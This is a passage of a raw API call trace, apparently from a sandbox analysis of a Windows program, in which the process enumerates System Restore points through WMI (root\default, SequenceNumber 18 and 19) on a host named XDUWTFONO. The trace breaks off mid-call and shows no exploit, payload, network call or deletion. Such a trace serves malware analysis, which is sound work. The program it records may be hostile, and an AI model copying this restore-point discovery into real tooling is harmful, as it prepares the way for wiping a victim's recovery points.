IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.841] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.841] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.842] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x60248f0) returned 0x0 [0122.842] WbemDefPath:IUnknown:QueryInterface (in: This=0x60248f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.842] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60248f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6025610) returned 0x0 [0122.842] WbemDefPath:IUnknown:Release (This=0x60248f0) returned 0x0 [0122.842] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025610, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6025610) returned 0x0 [0122.842] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025610, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.842] WbemDefPath:IUnknown:AddRef (This=0x6025610) returned 0x3 [0122.842] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025610, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.842] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025610, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.842] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025610, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe16d8) returned 0x0 [0122.842] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe16d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.843] WbemDefPath:IUnknown:Release (This=0xbe16d8) returned 0x3 [0122.843] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.843] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.843] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025610, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.843] WbemDefPath:IUnknown:Release (This=0x6025610) returned 0x2 [0122.843] WbemDefPath:IUnknown:Release (This=0x6025610) returned 0x1 [0122.843] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.843] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.843] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025610, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6025610) returned 0x0 [0122.843] WbemDefPath:IUnknown:AddRef (This=0x6025610) returned 0x3 [0122.843] WbemDefPath:IUnknown:Release (This=0x6025610) returned 0x2 [0122.843] WbemDefPath:IWbemPath:SetText (This=0x6025610, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=18") returned 0x0 [0122.843] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.843] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.843] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.843] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.843] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.843] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.843] IWbemClassObject:Get (in: This=0x6027850, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a3c68*=0, plFlavor=0x38a3c6c*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), pType=0x38a3c68*=19, plFlavor=0x38a3c6c*=0) returned 0x0 [0122.843] IWbemClassObject:Get (in: This=0x6027850, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a3c68*=19, plFlavor=0x38a3c6c*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12, varVal2=0x0), pType=0x38a3c68*=19, plFlavor=0x38a3c6c*=0) returned 0x0 [0122.843] CoTaskMemAlloc (cb=0x4) returned 0xbe1718 [0122.843] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe1718, puReturned=0x389bfe4 | out: apObjects=0xbe1718*=0x6027b20, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.845] IUnknown:QueryInterface (in: This=0x6027b20, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6027b20) returned 0x0 [0122.845] IUnknown:QueryInterface (in: This=0x6027b20, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.845] IUnknown:QueryInterface (in: This=0x6027b20, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.845] IUnknown:AddRef (This=0x6027b20) returned 0x3 [0122.845] IUnknown:QueryInterface (in: This=0x6027b20, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.845] IUnknown:QueryInterface (in: This=0x6027b20, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.845] IUnknown:QueryInterface (in: This=0x6027b20, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6027b24) returned 0x0 [0122.845] IMarshal:GetUnmarshalClass (in: This=0x6027b24, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.845] IUnknown:Release (This=0x6027b24) returned 0x3 [0122.845] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.845] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.845] IUnknown:QueryInterface (in: This=0x6027b20, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.845] IUnknown:Release (This=0x6027b20) returned 0x2 [0122.845] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.845] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.845] IUnknown:QueryInterface (in: This=0x6027b20, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6027b20) returned 0x0 [0122.845] IUnknown:AddRef (This=0x6027b20) returned 0x4 [0122.845] IUnknown:Release (This=0x6027b20) returned 0x3 [0122.846] IUnknown:Release (This=0x6027b20) returned 0x2 [0122.846] CoTaskMemFree (pv=0xbe1718) [0122.846] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.846] IUnknown:AddRef (This=0x6027b20) returned 0x3 [0122.846] IWbemClassObject:Get (in: This=0x6027b20, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.846] IWbemClassObject:Get (in: This=0x6027b20, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=19", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.846] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=19") returned 0x70 [0122.846] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=19") returned 0x70 [0122.846] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.846] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.846] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.846] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.847] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6024900) returned 0x0 [0122.847] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024900, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.847] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024900, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6025680) returned 0x0 [0122.847] WbemDefPath:IUnknown:Release (This=0x6024900) returned 0x0 [0122.847] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025680, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6025680) returned 0x0 [0122.847] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025680, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.847] WbemDefPath:IUnknown:AddRef (This=0x6025680) returned 0x3 [0122.847] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025680, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.847] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025680, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.847] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025680, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe1718) returned 0x0 [0122.847] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe1718, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.847] WbemDefPath:IUnknown:Release (This=0xbe1718) returned 0x3 [0122.847] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.847] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.847] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025680, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.847] WbemDefPath:IUnknown:Release (This=0x6025680) returned 0x2 [0122.848] WbemDefPath:IUnknown:Release (This=0x6025680) returned 0x1 [0122.848] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.848] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025680, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6025680) returned 0x0 [0122.848] WbemDefPath:IUnknown:AddRef (This=0x6025680) returned 0x3 [0122.848] WbemDefPath:IUnknown:Release (This=0x6025680) returned 0x2 [0122.848] WbemDefPath:IWbemPath:SetText (This=0x6025680, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=19") returned 0x0 [0122.848] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.848] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.848] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.848] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.848] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.848] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.848] IWbemClassObject:Get (in: This=0x6027b20, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a44b8*=0, plFlavor=0x38a44bc*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), pType=0x38a44b8*=19, plFlavor=0x38a44bc*=0) returned 0x0 [0122.848] IWbemClassObject:Get (in: This=0x6027b20, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a44b8*=19, plFlavor=0x38a44bc*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), pType=0x38a44b8*=19, plFlavor=0x38a44bc*=0) returned 0x0 [0122.848] CoTaskMemAlloc (cb=0x4) returned 0xbe1758 [0122.848] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe1758, puReturned=0x389bfe4 | out: apObjects=0xbe1758*=0x6027cb8, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.849] IUnknown:QueryInterface (in: This=0x6027cb8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6027cb8) returned 0x0 [0122.849] IUnknown:QueryInterface (in: This=0x6027cb8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.849] IUnknown:QueryInterface (in: This=0x6027cb8, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.849] IUnknown:AddRef (This=0x6027cb8) returned 0x3 [0122.850] IUnknown:QueryInterface (in: This=0x6027cb8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.850] IUnknown:QueryInterface (in: This=0x6027cb8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.850] IUnknown:QueryInterface (in: This=0x6027cb8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6027cbc) returned 0x0 [0122.850] IMarshal:GetUnmarshalClass (in: This=0x6027cbc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.850] IUnknown:Release (This=0x6027cbc) returned 0x3 [0122.850] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.850] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.850] IUnknown:QueryInterface (in: This=0x6027cb8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.850] IUnknown:Release (This=0x6027cb8) returned 0x2 [0122.850] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.850] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.850] IUnknown:QueryInterface (in: This=0x6027cb8, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6027cb8) returned 0x0 [0122.850] IUnknown:AddRef (This=0x6027cb8) returned 0x4 [0122.850] IUnknown:Release (This=0x6027cb8) returned 0x3 [0122.850] IUnknown:Release (This=0x6027cb8) returned 0x2 [0122.850] CoTaskMemFree (pv=0xbe1758) [0122.850] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.850] IUnknown:AddRef (This=0x6027cb8) returned 0x3 [0122.850] IWbemClassObject:Get (in: This=0x6027cb8, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.850] IWbemClassObject:Get (in: This=0x6027cb8, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, 